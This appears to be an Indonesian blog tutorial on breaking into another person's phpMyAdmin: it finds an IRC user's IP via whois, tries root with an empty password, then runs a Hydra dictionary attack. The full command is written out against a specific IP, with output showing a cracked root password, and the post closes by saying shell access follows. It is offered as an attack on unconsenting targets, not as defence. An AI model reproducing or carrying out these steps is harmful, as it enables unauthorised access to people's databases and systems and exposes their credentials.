penulis contohkan ada target dengan nick ce_wew yang online di IRC, Kita dapat klik
nick tersebut lalu kita lakukan whois.
Hasilnya seperti dibawah ini :
Bahasan kita saat ini dalah hacking password phpmyadmin, maka tentu dikomputer target
telah terinstall APACHE, MySQL dan PHPmyAdmin dan aktif, umumnya yang sudah
dalam 1 paket ada yang namanya XAMPP untuk Windows dan LAMPP untuk linux.
Setelah IP Target telah diketahui maka kita dapat copy paste IP-nya ke browser dengan
ditambahkan /phpmyadmim.
Secara umum mungkin penyerang tidak terlalu menyukai jika tampil tampilan seperti
diatas karena kemungkinan phpmyadmin dipassword adalah lebih besar, tapi dapat juga
dicoba misal dengan menggunakan akses user Name root dan Password dikosongkan,
jika cara inipun gagal maka kita dapat mencoba melakukan serangan dictionary attack
denga hydra sebagai berikut.
H:\hydra>hydra -m /phpmyadmin/ -l root -P pass.txt 180.254.111.31 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC - use allowed only for legal purposes
Hydra (http://www.thc.org) starting at 2011-10-23 22:07:11
[DATA] 7 tasks, 1 servers, 7 login tries (l:1/p:7), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.111.31 (waiting for childs to finish)
[80][www] host: 180.254.111.31 login: root password: lintas5
Hydra (http://www.thc.org) finished at 2011-10-23 22:07:13
mengetahui passwordnya maka kita dapat login ke phpmyadmin, dengan sedikit
exploitasi anda dapat mengakses shell di komputer target.
Sign up here with your email
ConversionConversion EmoticonEmoticon